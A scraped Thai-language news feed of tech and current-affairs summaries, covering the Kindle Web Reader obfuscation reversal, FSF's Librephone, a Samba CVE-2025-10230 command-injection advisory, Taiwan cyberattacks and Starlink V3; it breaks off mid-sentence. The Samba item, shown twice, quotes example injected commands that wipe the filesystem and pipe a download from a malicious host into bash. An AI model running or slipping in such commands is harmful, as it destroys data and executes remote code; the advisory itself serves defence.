    📚 “เมื่อ Kindle ไม่ให้ดาวน์โหลดหนังสือที่ซื้อ — นักพัฒนาแฮกระบบเว็บเพื่ออ่านในแอปที่ตัวเองเลือก” Pixelmelt นักพัฒนาสายแฮกเกอร์สายเทคนิค ได้เขียนบล็อกเล่าประสบการณ์สุดหัวร้อนหลังซื้อ eBook จาก Amazon แล้วพบว่าไม่สามารถอ่านผ่านแอปอื่นได้เลย Kindle Android app ก็ดันแครชซ้ำ ๆ ส่วน Kindle Web Reader ก็ไม่ให้ดาวน์โหลดไฟล์หรือ export ไปยัง Calibre ซึ่งเป็นแอปจัดการหนังสือยอดนิยมของสาย eBook เขาจึงตัดสินใจ “reverse-engineer” ระบบ obfuscation ของ Kindle Web Reader เพื่อดึงข้อมูลหนังสือออกมาอ่านในแอปที่ตัวเองเลือก โดยพบว่า Amazon ใช้เทคนิคซับซ้อนหลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหาจริง เช่น: 🔡 การแปลงตัวอักษรเป็น glyph ID แบบสุ่ม 🔡 การเปลี่ยน mapping ทุก 5 หน้า 🔡 การฝัง path SVG ที่ทำให้ parser ภายนอกอ่านผิด 🔡 การใช้หลาย font variant และ ligature 🔡 การจำกัด API ให้โหลดได้ทีละ 5 หน้าเท่านั้น Pixelmelt ลองใช้ OCR แต่ล้มเหลว จึงหันมาใช้เทคนิค “pixel-perfect matching” โดยเรนเดอร์ glyph เป็นภาพ แล้วใช้ perceptual hash และ SSIM เพื่อจับคู่กับตัวอักษรจากฟอนต์ Bookerly ที่ Amazon ใช้ ผลลัพธ์คือ เขาสามารถถอดรหัส glyph ทั้งหมด 361 แบบจากหนังสือ 920 หน้า และสร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับแทบทุกประการ เขาย้ำว่าเป้าหมายไม่ใช่การละเมิดลิขสิทธิ์ แต่เพื่ออ่านหนังสือที่ “ซื้อมาแล้ว” ในแอปที่ตัวเองเลือก และเพื่อเรียนรู้เทคนิคด้าน SVG, hashing และ font metrics ✅ ข้อมูลในข่าว ➡️ นักพัฒนาไม่สามารถอ่าน eBook ที่ซื้อจาก Amazon ในแอปอื่นได้ ➡️ Kindle Android app แครช และ Web Reader ไม่ให้ดาวน์โหลดหรือ export ➡️ Amazon ใช้ระบบ obfuscation หลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหา ➡️ ตัวอักษรถูกแปลงเป็น glyph ID แบบสุ่ม และเปลี่ยนทุก 5 หน้า ➡️ API จำกัดให้โหลดได้ทีละ 5 หน้า ➡️ glyphs ถูกฝังด้วย path SVG ที่ทำให้ parser อ่านผิด ➡️ ใช้หลาย font variant เช่น bold, italic, ligature ➡️ OCR ล้มเหลวในการจับคู่ glyph กับตัวอักษร ➡️ ใช้ perceptual hash และ SSIM เพื่อจับคู่ glyph กับฟอนต์ Bookerly ➡️ ถอดรหัส glyph ได้ครบ 361 แบบจากหนังสือ 920 หน้า ➡️ สร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับ ➡️ ย้ำว่าเป้าหมายคือการอ่านหนังสือที่ซื้อมาแล้ว ไม่ใช่ละเมิดลิขสิทธิ์ ➡️ ได้เรียนรู้เทคนิคด้าน SVG rendering, hashing และ font metrics https://blog.pixelmelt.dev/kindle-web-drm/
    BLOG.PIXELMELT.DEV
    How I Reversed Amazon's Kindle Web Obfuscation Because Their App Sucked
    As it turns out they don't actually want you to do this (and have some interesting ways to stop you)
    0 ความคิดเห็น 0 การแบ่งปัน 81 มุมมอง 0 รีวิว
  • “Librephone โดย FSF” — โปรเจกต์ปลดปล่อยมือถือจากซอฟต์แวร์ปิดซอร์ส ไม่ใช่แค่ Android fork แต่คือการท้าทายโครงสร้างระบบมือถือทั้งวงการ

    ในงานครบรอบ 40 ปีของ Free Software Foundation (FSF) ที่จัดขึ้นในบอสตัน มีการเปิดตัวโปรเจกต์ใหม่ชื่อ “Librephone” ซึ่งไม่ใช่แค่การสร้างระบบปฏิบัติการมือถือแบบโอเพ่นซอร์ส แต่เป็นความพยายามครั้งใหญ่ในการ “ปลดปล่อย” มือถือจากซอฟต์แวร์ปิดซอร์สที่ฝังอยู่ในชิปและเฟิร์มแวร์

    Rob Savoye หัวหน้าทีมพัฒนา Librephone ซึ่งมีประสบการณ์ยาวนานกับ GNU toolchain ระบุว่า เป้าหมายหลักของโปรเจกต์คือการ reverse-engineer และแทนที่ binary blobs ที่อยู่ใน SoC (System-on-Chip) ของมือถือ ซึ่งเป็นส่วนที่ทำให้ผู้ใช้ไม่สามารถควบคุมอุปกรณ์ของตัวเองได้อย่างแท้จริง

    FSF ยืนยันว่า Librephone ไม่ใช่แค่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์ใหม่ แต่จะเน้นการสร้างสเปกที่ชัดเจนสำหรับนักพัฒนานอกเขต DMCA เพื่อให้สามารถสร้างระบบที่เป็นอิสระได้ โดยจะเริ่มจากอุปกรณ์ที่มี “ปัญหาเรื่องเสรีภาพ” น้อยที่สุดก่อน

    แม้แต่ระบบยอดนิยมอย่าง LineageOS ก็ยังมี binary blobs อยู่ FSF จึงหวังว่า Librephone จะเป็นรากฐานให้กับระบบที่ปลอดจากซอฟต์แวร์ปิดซอร์สอย่างแท้จริง เช่นเดียวกับที่เคยสนับสนุนโครงการ Replicant มาก่อน

    ที่สำคัญคือ FSF ต้องการให้ชุมชนมีส่วนร่วม ไม่ว่าจะเป็นนักพัฒนา ผู้ทดสอบ นักเขียนเอกสาร หรือผู้สนับสนุนด้านการเงิน โดยสามารถติดตามรายละเอียดเพิ่มเติมได้ที่ librephone.fsf.org

    ข้อมูลในข่าว
    Librephone เป็นโปรเจกต์ใหม่จาก Free Software Foundation (FSF)
    เป้าหมายคือการ reverse-engineer และแทนที่ proprietary binary blobs ในมือถือ
    ไม่ใช่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์
    มุ่งเน้นการสร้างสเปกสำหรับนักพัฒนานอกเขต DMCA
    เริ่มจากอุปกรณ์ที่มีปัญหาเรื่องเสรีภาพน้อยที่สุด
    Rob Savoye เป็นหัวหน้าทีมพัฒนา มีประสบการณ์กับ GNU toolchain
    FSF เคยสนับสนุนโครงการ Replicant มาก่อน
    LineageOS ยังมี binary blobs อยู่
    Librephone จะเป็นรากฐานให้กับระบบมือถือที่เสรีอย่างแท้จริง
    เปิดรับอาสาสมัครทุกระดับ ไม่จำกัดเฉพาะวิศวกร
    สนับสนุนได้ผ่านการบริจาค ทดสอบ เขียนเอกสาร หรือเผยแพร่ข้อมูล

    https://news.itsfoss.com/librephone-project-overview/
    📱 “Librephone โดย FSF” — โปรเจกต์ปลดปล่อยมือถือจากซอฟต์แวร์ปิดซอร์ส ไม่ใช่แค่ Android fork แต่คือการท้าทายโครงสร้างระบบมือถือทั้งวงการ ในงานครบรอบ 40 ปีของ Free Software Foundation (FSF) ที่จัดขึ้นในบอสตัน มีการเปิดตัวโปรเจกต์ใหม่ชื่อ “Librephone” ซึ่งไม่ใช่แค่การสร้างระบบปฏิบัติการมือถือแบบโอเพ่นซอร์ส แต่เป็นความพยายามครั้งใหญ่ในการ “ปลดปล่อย” มือถือจากซอฟต์แวร์ปิดซอร์สที่ฝังอยู่ในชิปและเฟิร์มแวร์ Rob Savoye หัวหน้าทีมพัฒนา Librephone ซึ่งมีประสบการณ์ยาวนานกับ GNU toolchain ระบุว่า เป้าหมายหลักของโปรเจกต์คือการ reverse-engineer และแทนที่ binary blobs ที่อยู่ใน SoC (System-on-Chip) ของมือถือ ซึ่งเป็นส่วนที่ทำให้ผู้ใช้ไม่สามารถควบคุมอุปกรณ์ของตัวเองได้อย่างแท้จริง FSF ยืนยันว่า Librephone ไม่ใช่แค่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์ใหม่ แต่จะเน้นการสร้างสเปกที่ชัดเจนสำหรับนักพัฒนานอกเขต DMCA เพื่อให้สามารถสร้างระบบที่เป็นอิสระได้ โดยจะเริ่มจากอุปกรณ์ที่มี “ปัญหาเรื่องเสรีภาพ” น้อยที่สุดก่อน แม้แต่ระบบยอดนิยมอย่าง LineageOS ก็ยังมี binary blobs อยู่ FSF จึงหวังว่า Librephone จะเป็นรากฐานให้กับระบบที่ปลอดจากซอฟต์แวร์ปิดซอร์สอย่างแท้จริง เช่นเดียวกับที่เคยสนับสนุนโครงการ Replicant มาก่อน ที่สำคัญคือ FSF ต้องการให้ชุมชนมีส่วนร่วม ไม่ว่าจะเป็นนักพัฒนา ผู้ทดสอบ นักเขียนเอกสาร หรือผู้สนับสนุนด้านการเงิน โดยสามารถติดตามรายละเอียดเพิ่มเติมได้ที่ librephone.fsf.org ✅ ข้อมูลในข่าว ➡️ Librephone เป็นโปรเจกต์ใหม่จาก Free Software Foundation (FSF) ➡️ เป้าหมายคือการ reverse-engineer และแทนที่ proprietary binary blobs ในมือถือ ➡️ ไม่ใช่ Android fork และไม่เกี่ยวกับการผลิตฮาร์ดแวร์ ➡️ มุ่งเน้นการสร้างสเปกสำหรับนักพัฒนานอกเขต DMCA ➡️ เริ่มจากอุปกรณ์ที่มีปัญหาเรื่องเสรีภาพน้อยที่สุด ➡️ Rob Savoye เป็นหัวหน้าทีมพัฒนา มีประสบการณ์กับ GNU toolchain ➡️ FSF เคยสนับสนุนโครงการ Replicant มาก่อน ➡️ LineageOS ยังมี binary blobs อยู่ ➡️ Librephone จะเป็นรากฐานให้กับระบบมือถือที่เสรีอย่างแท้จริง ➡️ เปิดรับอาสาสมัครทุกระดับ ไม่จำกัดเฉพาะวิศวกร ➡️ สนับสนุนได้ผ่านการบริจาค ทดสอบ เขียนเอกสาร หรือเผยแพร่ข้อมูล https://news.itsfoss.com/librephone-project-overview/
    NEWS.ITSFOSS.COM
    Free Software Foundation Is Serious About The Librephone Project [To Bring Mobile Freedom To The Masses]
    Not just another Android fork, this project aims to liberate mobile computing at its core.
    0 ความคิดเห็น 0 การแบ่งปัน 89 มุมมอง 0 รีวิว
  • “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

    ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

    เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

    ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

    ทีม Samba แนะนำให้ผู้ดูแลระบบ:
    ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
    ปิดการใช้งาน WINS server (wins support = no)
    อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
    เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
    ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
    มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
    WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
    NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
    Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
    วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
    เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
    “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

    https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    🧨 “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ ทีม Samba แนะนำให้ผู้ดูแลระบบ: 🚑 ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf 🚑 ปิดการใช้งาน WINS server (wins support = no) 🚑 อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9 ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม ➡️ เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell ➡️ ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ➡️ มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook” ➡️ WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ ➡️ NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้ ➡️ Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ ➡️ วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no) ➡️ เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9 ➡️ “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    SECURITYONLINE.INFO
    Critical Samba RCE Flaw CVE-2025-10230 (CVSS 10.0) Allows Unauthenticated Command Injection on AD DCs
    Samba released an urgent fix for a Critical (CVSS 10.0) RCE flaw (CVE-2025-10230) allowing unauthenticated command injection on AD DCs when the WINS hook is enabled. Update to 4.23.2.
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • ทัพฟ้าโต้เฟกนิวส์ เขมรตีปี๊บข่าว"อังคณา" : [NEWS UPDATE]
    พลอากาศโท จักรกฤษณ์ ธรรมวิชัย โฆษกกองทัพอากาศ เผยกรณีกัมพูชาออกข่าวทหารไทยโจมตีกัมพูชาก่อน โดยใช้เครื่องบิน F-16 และ Gripen ยืนยัน การปะทะเมื่อวันที่ 24 กรกฎาคม 2568 มีการยิงจรวด BM- 21 เข้ามาในพื้นที่ไทยที่จังหวัดสุรินทร์ ส่งผลให้คนไทยเสียชีวิตและบาดเจ็บ กองทัพอากาศตอบโต้โดยส่งเครื่องบิน F-16 โจมตีเป้าหมายทางทหารของกัมพูชา ใช้ระเบิดความแม่นยำสูง เพื่อไม่ให้กระทบพลเรือน ข่าวดังกล่าวเป็นเฟกนิวส์ดิสเครดิตกองทัพไทย กรณีนางอังคณา นีละไพจิตร สว. ให้ความเห็นเรื่องการใช้เครื่องบิน F-16 โจมตีกัมพูชา ทางกัมพูชาเอาข่าวนางอังคณาไปขยายผล กองทัพอากาศไม่ได้ตอบโต้ สว. แต่ตอบโต้สิ่งที่ไม่ถูกต้อง และยืนยันข้อเท็จจริงว่า ปฎิบัติการของเราอยู่บนพื้นฐานการป้องกันตนเอง ของกฎบัตรสหประชาชาติ ตลอดช่วงที่โจมตีเลือกเป้าหมายทางทหารทั้งหมด




    ส่อผิดจริยธรรมร้ายแรง

    รอดูร่างสุดท้ายลงมติ

    "นาท ภูวนัย"ตำนานหนังไทย

    ยึดบิตคอยน์แก๊งสแกมเมอร์
    ทัพฟ้าโต้เฟกนิวส์ เขมรตีปี๊บข่าว"อังคณา" : [NEWS UPDATE] พลอากาศโท จักรกฤษณ์ ธรรมวิชัย โฆษกกองทัพอากาศ เผยกรณีกัมพูชาออกข่าวทหารไทยโจมตีกัมพูชาก่อน โดยใช้เครื่องบิน F-16 และ Gripen ยืนยัน การปะทะเมื่อวันที่ 24 กรกฎาคม 2568 มีการยิงจรวด BM- 21 เข้ามาในพื้นที่ไทยที่จังหวัดสุรินทร์ ส่งผลให้คนไทยเสียชีวิตและบาดเจ็บ กองทัพอากาศตอบโต้โดยส่งเครื่องบิน F-16 โจมตีเป้าหมายทางทหารของกัมพูชา ใช้ระเบิดความแม่นยำสูง เพื่อไม่ให้กระทบพลเรือน ข่าวดังกล่าวเป็นเฟกนิวส์ดิสเครดิตกองทัพไทย กรณีนางอังคณา นีละไพจิตร สว. ให้ความเห็นเรื่องการใช้เครื่องบิน F-16 โจมตีกัมพูชา ทางกัมพูชาเอาข่าวนางอังคณาไปขยายผล กองทัพอากาศไม่ได้ตอบโต้ สว. แต่ตอบโต้สิ่งที่ไม่ถูกต้อง และยืนยันข้อเท็จจริงว่า ปฎิบัติการของเราอยู่บนพื้นฐานการป้องกันตนเอง ของกฎบัตรสหประชาชาติ ตลอดช่วงที่โจมตีเลือกเป้าหมายทางทหารทั้งหมด ส่อผิดจริยธรรมร้ายแรง รอดูร่างสุดท้ายลงมติ "นาท ภูวนัย"ตำนานหนังไทย ยึดบิตคอยน์แก๊งสแกมเมอร์
    0 ความคิดเห็น 0 การแบ่งปัน 353 มุมมอง 0 0 รีวิว
  • “ไต้หวันเตือนภัยไซเบอร์จากจีนทวีความรุนแรง” — เมื่อการแฮกและข่าวปลอมกลายเป็นอาวุธก่อนเลือกตั้งปี 2026

    สำนักงานความมั่นคงแห่งชาติของไต้หวัน (NSB) รายงานต่อรัฐสภาว่า ประเทศกำลังเผชิญกับการโจมตีทางไซเบอร์จากจีนอย่างหนัก โดยเฉลี่ยแล้วมีการพยายามเจาะระบบถึง 2.8 ล้านครั้งต่อวัน เพิ่มขึ้น 17% จากปีที่ผ่านมา

    นอกจากการแฮกข้อมูลแล้ว จีนยังดำเนินการรณรงค์ข่าวปลอมผ่าน “กองทัพโทรลออนไลน์” ที่ใช้บัญชีโซเชียลมีเดียกว่า 10,000 บัญชีในการเผยแพร่โพสต์ปลอมมากกว่า 1.5 ล้านรายการ โดยเนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายภายในของไต้หวัน รวมถึงการเจรจาการค้ากับสหรัฐฯ

    กลุ่มแฮกเกอร์ที่เกี่ยวข้อง เช่น APT41, Volt Typhoon และ Salt Typhoon มุ่งเป้าไปที่โครงสร้างพื้นฐานสำคัญ เช่น การป้องกันประเทศ โทรคมนาคม พลังงาน และสาธารณสุข โดยใช้มัลแวร์และช่องทางใน dark web เพื่อขโมยข้อมูลและเผยแพร่เนื้อหาบิดเบือน

    จีนปฏิเสธข้อกล่าวหาทั้งหมด และกลับกล่าวหาสหรัฐฯ ว่าเป็น “นักเลงไซเบอร์ตัวจริงของโลก” โดยอ้างว่า NSA เคยโจมตีโครงสร้างพื้นฐานของจีนหลายครั้ง

    ข้อมูลในข่าว
    ไต้หวันเผชิญการโจมตีไซเบอร์จากจีนเฉลี่ย 2.8 ล้านครั้งต่อวัน
    เพิ่มขึ้น 17% จากปีที่ผ่านมา
    จีนใช้บัญชีโทรลกว่า 10,000 บัญชีเผยแพร่โพสต์ปลอมกว่า 1.5 ล้านรายการ
    เนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายของไต้หวัน
    กลุ่มแฮกเกอร์ที่เกี่ยวข้อง ได้แก่ APT41, Volt Typhoon, Salt Typhoon
    เป้าหมายคือโครงสร้างพื้นฐานสำคัญ เช่น กลาโหม โทรคมนาคม พลังงาน และสาธารณสุข
    ใช้มัลแวร์และช่องทาง dark web ในการเผยแพร่ข้อมูล
    จีนปฏิเสธข้อกล่าวหาและกล่าวหาสหรัฐฯ ว่าเป็นผู้โจมตีไซเบอร์ตัวจริง

    https://www.techradar.com/pro/security/taiwan-warns-chinese-cyberattacks-are-intensifying
    🛡️ “ไต้หวันเตือนภัยไซเบอร์จากจีนทวีความรุนแรง” — เมื่อการแฮกและข่าวปลอมกลายเป็นอาวุธก่อนเลือกตั้งปี 2026 สำนักงานความมั่นคงแห่งชาติของไต้หวัน (NSB) รายงานต่อรัฐสภาว่า ประเทศกำลังเผชิญกับการโจมตีทางไซเบอร์จากจีนอย่างหนัก โดยเฉลี่ยแล้วมีการพยายามเจาะระบบถึง 2.8 ล้านครั้งต่อวัน เพิ่มขึ้น 17% จากปีที่ผ่านมา นอกจากการแฮกข้อมูลแล้ว จีนยังดำเนินการรณรงค์ข่าวปลอมผ่าน “กองทัพโทรลออนไลน์” ที่ใช้บัญชีโซเชียลมีเดียกว่า 10,000 บัญชีในการเผยแพร่โพสต์ปลอมมากกว่า 1.5 ล้านรายการ โดยเนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายภายในของไต้หวัน รวมถึงการเจรจาการค้ากับสหรัฐฯ กลุ่มแฮกเกอร์ที่เกี่ยวข้อง เช่น APT41, Volt Typhoon และ Salt Typhoon มุ่งเป้าไปที่โครงสร้างพื้นฐานสำคัญ เช่น การป้องกันประเทศ โทรคมนาคม พลังงาน และสาธารณสุข โดยใช้มัลแวร์และช่องทางใน dark web เพื่อขโมยข้อมูลและเผยแพร่เนื้อหาบิดเบือน จีนปฏิเสธข้อกล่าวหาทั้งหมด และกลับกล่าวหาสหรัฐฯ ว่าเป็น “นักเลงไซเบอร์ตัวจริงของโลก” โดยอ้างว่า NSA เคยโจมตีโครงสร้างพื้นฐานของจีนหลายครั้ง ✅ ข้อมูลในข่าว ➡️ ไต้หวันเผชิญการโจมตีไซเบอร์จากจีนเฉลี่ย 2.8 ล้านครั้งต่อวัน ➡️ เพิ่มขึ้น 17% จากปีที่ผ่านมา ➡️ จีนใช้บัญชีโทรลกว่า 10,000 บัญชีเผยแพร่โพสต์ปลอมกว่า 1.5 ล้านรายการ ➡️ เนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายของไต้หวัน ➡️ กลุ่มแฮกเกอร์ที่เกี่ยวข้อง ได้แก่ APT41, Volt Typhoon, Salt Typhoon ➡️ เป้าหมายคือโครงสร้างพื้นฐานสำคัญ เช่น กลาโหม โทรคมนาคม พลังงาน และสาธารณสุข ➡️ ใช้มัลแวร์และช่องทาง dark web ในการเผยแพร่ข้อมูล ➡️ จีนปฏิเสธข้อกล่าวหาและกล่าวหาสหรัฐฯ ว่าเป็นผู้โจมตีไซเบอร์ตัวจริง https://www.techradar.com/pro/security/taiwan-warns-chinese-cyberattacks-are-intensifying
    WWW.TECHRADAR.COM
    Taiwan warns Chinese cyberattacks are intensifying
    Breaches and misinformation campaigns are rampant
    0 ความคิดเห็น 0 การแบ่งปัน 116 มุมมอง 0 รีวิว
  • “SpaceX เปิดตัวดาวเทียม Starlink V3” — อินเทอร์เน็ตระดับกิกะบิตจากอวกาศ พร้อมขยายความจุเครือข่ายถึง 60 Tbps

    SpaceX เผยโฉมดาวเทียม Starlink รุ่นใหม่ V3 ที่มาพร้อมขนาดใหญ่ขึ้น น้ำหนักมากขึ้น และความสามารถในการส่งข้อมูลที่เหนือชั้น โดยมีเป้าหมายเพื่อให้บริการอินเทอร์เน็ตความเร็วระดับกิกะบิตแก่ผู้ใช้ทั่วโลก

    ดาวเทียม V3 หนักถึง 2,000 กิโลกรัม ซึ่งมากกว่ารุ่น V2 Mini ที่หนักไม่ถึง 600 กิโลกรัม และ V1 ที่หนักประมาณ 300 กิโลกรัม ด้วยขนาดและน้ำหนักที่เพิ่มขึ้น SpaceX จึงใช้ยาน Starship ที่ทรงพลังมากกว่ารุ่น Falcon 9 เพื่อส่งดาวเทียมขึ้นสู่วงโคจร โดยแต่ละเที่ยวบินสามารถบรรทุกดาวเทียม V3 ได้ถึง 60 ดวง ซึ่งเพิ่มความจุเครือข่ายมากกว่า 20 เท่าต่อเที่ยวบินเมื่อเทียบกับ V2 Mini

    ดาวเทียม V3 มีความสามารถในการดาวน์โหลดข้อมูลสูงถึง 1,000 Gbps และอัปโหลด 200 Gbps ต่อดวง รวมกันแล้วสามารถเพิ่มความจุเครือข่าย Starlink ได้ถึง 60 Tbps ซึ่งเป็นก้าวสำคัญในการทำให้วิสัยทัศน์ของ Elon Musk ในการให้บริการอินเทอร์เน็ตทั่วโลกเป็นจริง

    อย่างไรก็ตาม ผู้ใช้จะต้องมีฮาร์ดแวร์ใหม่เพื่อรองรับความเร็วที่ดาวเทียม V3 สามารถให้บริการได้ และ SpaceX ยืนยันว่าดาวเทียม V3 จะถูกออกแบบให้เผาไหม้หมดเมื่อหมดอายุการใช้งาน เพื่อลดปัญหาขยะอวกาศ

    ข้อมูลในข่าว
    SpaceX เปิดตัวดาวเทียม Starlink V3 ขนาดใหญ่และหนักถึง 2,000 กิโลกรัม
    ใช้ยาน Starship ส่งขึ้นสู่วงโคจร แทน Falcon 9
    แต่ละเที่ยวบินสามารถบรรทุกดาวเทียม V3 ได้ถึง 60 ดวง
    เพิ่มความจุเครือข่ายมากกว่า 20 เท่าต่อเที่ยวบินเมื่อเทียบกับ V2 Mini
    ความสามารถดาวน์โหลด 1,000 Gbps และอัปโหลด 200 Gbps ต่อดวง
    เพิ่มความจุเครือข่ายรวมถึง 60 Tbps
    ผู้ใช้ต้องมีฮาร์ดแวร์ใหม่เพื่อรองรับความเร็วระดับกิกะบิต
    ดาวเทียม V3 ถูกออกแบบให้เผาไหม้หมดเมื่อหมดอายุการใช้งาน

    https://www.tomshardware.com/service-providers/network-providers/spacex-shows-off-massive-new-v3-starlink-satellites-expanded-technology-will-deliver-gigabit-internet-to-customers-for-the-first-time-and-enable-60-tera-bits-per-second-downlink-capacity
    🛰️ “SpaceX เปิดตัวดาวเทียม Starlink V3” — อินเทอร์เน็ตระดับกิกะบิตจากอวกาศ พร้อมขยายความจุเครือข่ายถึง 60 Tbps SpaceX เผยโฉมดาวเทียม Starlink รุ่นใหม่ V3 ที่มาพร้อมขนาดใหญ่ขึ้น น้ำหนักมากขึ้น และความสามารถในการส่งข้อมูลที่เหนือชั้น โดยมีเป้าหมายเพื่อให้บริการอินเทอร์เน็ตความเร็วระดับกิกะบิตแก่ผู้ใช้ทั่วโลก ดาวเทียม V3 หนักถึง 2,000 กิโลกรัม ซึ่งมากกว่ารุ่น V2 Mini ที่หนักไม่ถึง 600 กิโลกรัม และ V1 ที่หนักประมาณ 300 กิโลกรัม ด้วยขนาดและน้ำหนักที่เพิ่มขึ้น SpaceX จึงใช้ยาน Starship ที่ทรงพลังมากกว่ารุ่น Falcon 9 เพื่อส่งดาวเทียมขึ้นสู่วงโคจร โดยแต่ละเที่ยวบินสามารถบรรทุกดาวเทียม V3 ได้ถึง 60 ดวง ซึ่งเพิ่มความจุเครือข่ายมากกว่า 20 เท่าต่อเที่ยวบินเมื่อเทียบกับ V2 Mini ดาวเทียม V3 มีความสามารถในการดาวน์โหลดข้อมูลสูงถึง 1,000 Gbps และอัปโหลด 200 Gbps ต่อดวง รวมกันแล้วสามารถเพิ่มความจุเครือข่าย Starlink ได้ถึง 60 Tbps ซึ่งเป็นก้าวสำคัญในการทำให้วิสัยทัศน์ของ Elon Musk 